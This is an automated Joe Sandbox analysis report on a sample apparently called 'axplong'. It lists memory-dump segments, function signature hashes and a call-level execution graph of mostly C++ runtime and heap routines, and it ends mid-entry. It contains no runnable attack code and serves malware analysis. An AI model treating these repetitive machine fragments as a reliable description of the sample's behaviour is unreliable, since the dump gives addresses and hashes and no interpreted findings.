                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768746480.00000000008A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768765033.00000000008BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768779649.00000000008BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768793213.00000000008BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768807399.00000000008C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768823367.00000000008D3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768845576.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768859098.00000000008D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768874341.00000000008DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768891184.00000000008F1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768905837.00000000008F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768921386.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768969984.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768984610.00000000008F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769000531.00000000008FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769015221.00000000008FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769031612.00000000008FE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769047938.0000000000906000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769062427.0000000000908000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769062427.0000000000946000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769108637.0000000000974000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769123572.0000000000976000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769136569.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769151732.000000000097D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769164889.000000000097F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769179945.000000000098D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769193334.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_670000_axplong.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ___std_exception_copy
                                                                                                                                                                                                                                                    • String ID: P#g$P#g
                                                                                                                                                                                                                                                    • API String ID: 2659868963-973111119
                                                                                                                                                                                                                                                    • Opcode ID: df1bbba384a2facce96bc0a290178c2f86429fd23727a9a45f3fe4ae41c871bf
                                                                                                                                                                                                                                                    • Instruction ID: a6091c4acdaf1db558d12abb9680923bbcd6a46841ae4b88f55afac9d3ad09e6
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: df1bbba384a2facce96bc0a290178c2f86429fd23727a9a45f3fe4ae41c871bf
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F6D012B29202159BD6109F99D801D42BBDDDE56654714862AF544E7200F670E9908BE4
                                                                                                                                                                                                                                                    Function 00672E10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • __Mtx_destroy_in_situ.LIBCPMT ref: 00672E1D
                                                                                                                                                                                                                                                    • __Cnd_destroy_in_situ.LIBCPMT ref: 00672E26
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000001.00000002.1768336160.0000000000671000.00000040.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768318896.0000000000670000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768336160.00000000006D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768392135.00000000006D9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768407032.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768422851.00000000006E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768436667.00000000006E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768456368.00000000006E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768563441.0000000000838000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768578614.000000000083B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768596796.0000000000851000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768596796.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768639700.000000000087A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768654389.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768672961.0000000000890000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768687224.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768701857.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768716608.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768730939.000000000089D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768746480.00000000008A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768765033.00000000008BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768779649.00000000008BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768793213.00000000008BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768807399.00000000008C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768823367.00000000008D3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768845576.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768859098.00000000008D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768874341.00000000008DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768891184.00000000008F1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768905837.00000000008F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768921386.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768969984.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768984610.00000000008F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769000531.00000000008FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769015221.00000000008FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769031612.00000000008FE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769047938.0000000000906000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769062427.0000000000908000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769062427.0000000000946000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769108637.0000000000974000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769123572.0000000000976000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769136569.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769151732.000000000097D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769164889.000000000097F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769179945.000000000098D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769193334.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_670000_axplong.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Cnd_destroy_in_situMtx_destroy_in_situ
                                                                                                                                                                                                                                                    • String ID: @.g
                                                                                                                                                                                                                                                    • API String ID: 1432671424-1460316421
                                                                                                                                                                                                                                                    • Opcode ID: 8f9007bd953d705fe5a4f994f14d7b153dc451e3f712881f5725d72eb53358cb
                                                                                                                                                                                                                                                    • Instruction ID: 23399c10c575e542cd2c40d5e2b745055e7cb16b1d8bfeddc170e5a0ea6f1feb
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8f9007bd953d705fe5a4f994f14d7b153dc451e3f712881f5725d72eb53358cb
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6DD012B68026115BC764FF90A801C877BDEFE063103410D5EF4D197601EBB0A5588BA4

                                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                                    Execution Coverage:6.1%
                                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                    Signature Coverage:0%
                                                                                                                                                                                                                                                    Total number of Nodes:1109
                                                                                                                                                                                                                                                    Total number of Limit Nodes:113
                                                                                                                                                                                                                                                    execution_graph 37092 67a6e7 37096 67a6ef ISource 37092->37096 37093 67a7c2 ISource 37103 687f30 37093->37103 37094 67a87e 37100 67a883 37094->37100 37118 6a6b9a 37094->37118 37096->37093 37096->37094 37098 67a833 37099 67a8d7 37100->37099 37121 6a6559 GetPEB GetPEB RtlAllocateHeap IsInExceptionSpec 37100->37121 37102 67a8e0 37107 687f4e __InternalCxxFrameHandler 37103->37107 37108 687f74 37103->37108 37104 68805e 37130 6891a0 RtlAllocateHeap RtlAllocateHeap Concurrency::details::_CancellationTokenState::_RegisterCallback 37104->37130 37106 688063 37131 672440 RtlAllocateHeap RtlAllocateHeap ___std_exception_copy Concurrency::details::_CancellationTokenState::_RegisterCallback Concurrency::details::ResourceManager::ResourceManager 37106->37131 37107->37098 37108->37104 37110 687fc8 37108->37110 37111 687fed 37108->37111 37110->37106 37122 68d312 37110->37122 37113 68d312 Concurrency::details::ThreadScheduler::Create 2 API calls 37111->37113 37115 687fd9 std::_Rethrow_future_exception 37111->37115 37112 688068 37113->37115 37116 6a6b9a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37115->37116 37117 688040 ISource 37115->37117 37116->37104 37117->37098 37143 6a6b26 RtlAllocateHeap __dosmaperr __wsopen_s 37118->37143 37120 6a6ba9 __wsopen_s 37121->37102 37125 68d317 Concurrency::details::ThreadScheduler::Create 37122->37125 37124 68d331 37124->37115 37125->37124 37126 672440 Concurrency::details::_CancellationTokenState::_RegisterCallback Concurrency::details::ResourceManager::ResourceManager 37125->37126 37132 6a8aa4 37125->37132 37127 68d33d Concurrency::details::ResourceManager::ResourceManager 37126->37127 37138 6a37dc RtlAllocateHeap RtlAllocateHeap Concurrency::details::_TaskCollection::_FullAliasWait ___std_exception_destroy ___std_exception_copy 37126->37138 37129 672483 37129->37115 37131->37112 37137 6aaf0b _unexpected Concurrency::details::ThreadScheduler::Create 37132->37137 37133 6aaf49 37139 6a7443 37133->37139 37134 6aaf34 RtlAllocateHeap 37136 6aaf47 37134->37136 37134->37137 37136->37125 37137->37133 37137->37134 37138->37129 37142 6aa688 RtlAllocateHeap _unexpected __freea 37139->37142 37141 6a7448 37141->37136 37142->37141 37143->37120 37144 677560 37147 67759e 37144->37147 37145 687f30 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37146 67764a 37145->37146 37148 687f30 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37146->37148 37151 677624 37147->37151 37157 68d57e RtlAllocateHeap RtlAllocateHeap 37147->37157 37150 677663 37148->37150 37152 687f30 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37150->37152 37151->37145 37153 67767c ISource 37152->37153 37154 6a6b9a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37153->37154 37156 67774f ISource 37153->37156 37155 677770 37154->37155 37157->37151 37158 67e540 37159 67e54e 37158->37159 37164 67e562 ISource 37158->37164 37160 67e9ce 37159->37160 37159->37164 37161 6a6b9a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37160->37161 37194 67e751 37160->37194 37161->37194 37162 6a6b9a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37163 67e9d8 37162->37163 37165 687870 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37163->37165 37280 687870 37164->37280 37166 67ea29 37165->37166 37315 675b20 37166->37315 37169 67e6de 37171 687870 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37169->37171 37170 67ea31 37327 6882f0 37170->37327 37173 67e6f3 37171->37173 37175 687870 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37173->37175 37174 67ea46 37335 688150 37174->37335 37177 67e705 37175->37177 37294 67bd60 37177->37294 37179 67e711 37180 687870 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37179->37180 37181 67e726 37180->37181 37182 687870 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37181->37182 37183 67e73e 37182->37183 37185 675b20 2 API calls 37183->37185 37184 67ea55 37188 687870 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37184->37188 37186 67e745 37185->37186 37343 6784b0 37186->37343 37189 67ec70 37188->37189 37190 675b20 2 API calls 37189->37190 37191 67ec78 37190->37191 37192 6882f0 2 API calls 37191->37192 37193 67ec8d 37192->37193 37195 688150 2 API calls 37193->37195 37194->37162 37196 67e9a9 ISource __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 37194->37196 37199 67ec9c 37195->37199 37197 687f30 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37197->37199 37198 67f5a9 ISource 37199->37197 37199->37198 37200 67f5db 37199->37200 37201 6a6b9a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37200->37201 37202 67f5e0 37201->37202 37203 687870 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37202->37203 37204 67f637 37203->37204 37205 675b20 2 API calls 37204->37205 37206 67f63e 37205->37206 37207 687870 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37206->37207 37208 67f651 37207->37208 37209 687870 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37208->37209 37210 67f666 37209->37210 37211 687870 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37210->37211 37212 67f67b 37211->37212 37213 687870 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37212->37213 37214 67f68d 37213->37214 37352 67e440 RtlAllocateHeap RtlAllocateHeap ISource __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z Concurrency::details::_CancellationTokenState::_RegisterCallback 37214->37352 37216 67f696 37217 687f30 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37216->37217 37218 67f6ba 37217->37218 37219 687870 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37218->37219 37220 67f6ca 37219->37220 37221 687f30 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37220->37221 37222 67f6e7 37221->37222 37223 687f30 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37222->37223 37225 67f700 37223->37225 37224 67f892 ISource __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 37225->37224 37226 6a6b9a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37225->37226 37227 67f8c0 37226->37227 37228 687870 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37227->37228 37229 67f914 37228->37229 37230 675b20 2 API calls 37229->37230 37231 67f91b 37230->37231 37232 687870 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37231->37232 37233 67f92e 37232->37233 37234 687870 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37233->37234 37235 67f943 37234->37235 37236 687870 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37235->37236 37237 67f958 37236->37237 37238 687870 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37237->37238 37239 67f96a 37238->37239 37353 67e440 RtlAllocateHeap RtlAllocateHeap ISource __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z Concurrency::details::_CancellationTokenState::_RegisterCallback 37239->37353 37241 67fa45 ISource 37242 67f973 37242->37241 37243 6a6b9a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37242->37243 37244 67fa64 37243->37244 37245 687870 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37244->37245 37246 67fab5 37245->37246 37354 6794b0 RtlAllocateHeap RtlAllocateHeap ISource __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z Concurrency::details::_CancellationTokenState::_RegisterCallback 37246->37354 37248 67fac4 37355 679160 RtlAllocateHeap RtlAllocateHeap ISource __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z Concurrency::details::_CancellationTokenState::_RegisterCallback 37248->37355 37250 67fad3 37356 688250 37250->37356 37252 67faeb 37252->37252 37253 687f30 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37252->37253 37254 67fb9c 37253->37254 37255 687870 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37254->37255 37256 67fbb7 37255->37256 37257 687870 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37256->37257 37258 67fbc9 37257->37258 37360 67c280 RtlAllocateHeap ISource __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z Concurrency::details::_CancellationTokenState::_RegisterCallback 37258->37360 37260 67fbd2 37361 6a6659 37260->37361 37263 687870 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37264 6804e4 37263->37264 37265 675b20 2 API calls 37264->37265 37266 6804eb 37265->37266 37267 687870 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37266->37267 37268 680501 37267->37268 37269 687870 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37268->37269 37270 680519 37269->37270 37271 687870 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37270->37271 37272 680531 37271->37272 37273 687870 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37272->37273 37274 680543 37273->37274 37364 67e440 RtlAllocateHeap RtlAllocateHeap ISource __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z Concurrency::details::_CancellationTokenState::_RegisterCallback 37274->37364 37276 680790 ISource __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 37277 68054c 37277->37276 37278 6a6b9a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37277->37278 37279 6807e3 37278->37279 37281 687896 37280->37281 37282 68789d 37281->37282 37283 6878f1 37281->37283 37284 6878d2 37281->37284 37282->37169 37287 68d312 Concurrency::details::ThreadScheduler::Create 2 API calls 37283->37287 37291 6878e6 std::_Rethrow_future_exception 37283->37291 37285 687929 37284->37285 37286 6878d9 37284->37286 37365 672440 RtlAllocateHeap RtlAllocateHeap ___std_exception_copy Concurrency::details::_CancellationTokenState::_RegisterCallback Concurrency::details::ResourceManager::ResourceManager 37285->37365 37289 68d312 Concurrency::details::ThreadScheduler::Create 2 API calls 37286->37289 37287->37291 37290 6878df 37289->37290 37290->37291 37292 6a6b9a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37290->37292 37291->37169 37293 687933 __Cnd_destroy_in_situ ISource __Mtx_destroy_in_situ Concurrency::details::_CancellationTokenState::_RegisterCallback Concurrency::details::_TaskCollection::~_TaskCollection 37292->37293 37293->37169 37295 67bdb2 37294->37295 37296 67c1a1 37294->37296 37295->37296 37298 67bdc6 37295->37298 37297 687f30 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37296->37297 37299 67c14e ISource 37297->37299 37302 687870 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37298->37302 37300 6a6b9a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37299->37300 37303 67c19c ISource __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 37299->37303 37301 67c274 37300->37301 37304 67be3d 37302->37304 37303->37179 37305 675b20 2 API calls 37304->37305 37309 67be48 ISource 37305->37309 37306 687870 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37307 67bed9 37306->37307 37308 675b20 2 API calls 37307->37308 37310 67bee4 37308->37310 37309->37306 37311 687870 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37310->37311 37312 67befd 37311->37312 37313 675b20 2 API calls 37312->37313 37314 67bf08 ISource __InternalCxxFrameHandler 37313->37314 37366 675850 37315->37366 37319 675b7a 37390 674af0 37319->37390 37321 675b8b ISource 37322 675bf7 ISource 37321->37322 37324 6a6b9a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37321->37324 37323 675c27 ISource __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 37322->37323 37325 6a6b9a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37322->37325 37323->37170 37324->37322 37326 675c57 37325->37326 37402 6875d0 37327->37402 37329 688369 37331 688384 __InternalCxxFrameHandler 37329->37331 37416 688e70 2 API calls 4 library calls 37329->37416 37334 6883d8 __InternalCxxFrameHandler 37331->37334 37417 688e70 2 API calls 4 library calls 37331->37417 37333 68841e 37333->37174 37334->37174 37336 688178 37335->37336 37337 6881c2 37335->37337 37336->37337 37338 688181 37336->37338 37339 6881d1 __InternalCxxFrameHandler 37337->37339 37425 688e70 2 API calls 4 library calls 37337->37425 37420 6891b0 37338->37420 37339->37184 37342 68818a 37342->37184 37347 6785d0 ISource 37343->37347 37351 678505 ISource 37343->37351 37344 678697 37427 688070 RtlAllocateHeap RtlAllocateHeap 37344->37427 37346 687f30 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37346->37351 37348 678670 ISource __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 37347->37348 37349 6a6b9a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37347->37349 37348->37194 37350 6786a1 37349->37350 37351->37344 37351->37346 37351->37347 37352->37216 37353->37242 37354->37248 37355->37250 37357 688269 37356->37357 37358 68827d __InternalCxxFrameHandler 37357->37358 37428 688e70 2 API calls 4 library calls 37357->37428 37358->37252 37360->37260 37429 6a65a2 37361->37429 37363 67fbf1 37363->37263 37364->37277 37365->37290 37397 687df0 2 API calls 4 library calls 37366->37397 37368 67587b 37369 6758f0 37368->37369 37398 687df0 2 API calls 4 library calls 37369->37398 37371 687870 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37383 675955 37371->37383 37372 675b19 37400 688070 RtlAllocateHeap RtlAllocateHeap 37372->37400 37373 675aed __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 37373->37319 37375 687f30 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37375->37383 37383->37371 37383->37372 37383->37373 37383->37375 37399 675640 RtlAllocateHeap RtlAllocateHeap ISource __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z Concurrency::details::_CancellationTokenState::_RegisterCallback 37383->37399 37391 674b24 37390->37391 37392 674b4e 37390->37392 37393 687f30 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37391->37393 37401 687df0 2 API calls 4 library calls 37392->37401 37394 674b3b __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 37393->37394 37394->37321 37396 674bab __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 37396->37321 37397->37368 37398->37383 37399->37383 37401->37396 37403 6875eb 37402->37403 37415 6876d4 ISource std::_Rethrow_future_exception 37402->37415 37404 687761 37403->37404 37407 68765a 37403->37407 37408 687681 37403->37408 37414 68766b std::_Rethrow_future_exception 37403->37414 37403->37415 37418 6891a0 RtlAllocateHeap RtlAllocateHeap Concurrency::details::_CancellationTokenState::_RegisterCallback 37404->37418 37406 687766 37419 672440 RtlAllocateHeap RtlAllocateHeap ___std_exception_copy Concurrency::details::_CancellationTokenState::_RegisterCallback Concurrency::details::ResourceManager::ResourceManager 37406->37419 37407->37406 37411 68d312 Concurrency::details::ThreadScheduler::Create 2 API calls 37407->37411 37412 68d312 Concurrency::details::ThreadScheduler::Create 2 API calls 37408->37412 37408->37414 37410 68776b 37411->37414 37412->37414 37413 6a6b9a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37413->37404 37414->37413 37414->37415 37415->37329 37416->37331 37417->37333 37419->37410 37421 6891c4 37420->37421 37424 6891d5 __InternalCxxFrameHandler std::_Rethrow_future_exception 37421->37424 37426 689410 2 API calls 4 library calls 37421->37426 37423 68925b 37423->37342 37424->37342 37425->37339 37426->37423 37428->37358 37431 6a65ae __FrameHandler3::FrameUnwindToState 37429->37431 37430 6a65b5 37432 6a7443 __dosmaperr RtlAllocateHeap 37430->37432 37431->37430 37433 6a65d5 37431->37433 37434 6a65ba 37432->37434 37436 6a65da 37433->37436 37437 6a65e7 37433->37437 37447 6a6b8a RtlAllocateHeap __wsopen_s 37434->37447 37438 6a7443 __dosmaperr RtlAllocateHeap 37436->37438 37443 6aa783 37437->37443 37442 6a65c5 37438->37442 37440 6a65f0 37441 6a7443 __dosmaperr RtlAllocateHeap 37440->37441 37440->37442 37441->37442 37442->37363 37444 6aa78f __FrameHandler3::FrameUnwindToState IsInExceptionSpec 37443->37444 37448 6aa827 37444->37448 37446 6aa7aa 37446->37440 37447->37442 37449 6aa84a ___scrt_uninitialize_crt 37448->37449 37453 6aa890 ___scrt_uninitialize_crt __wsopen_s 37449->37453 37454 6ad6ef 37449->37454 37451 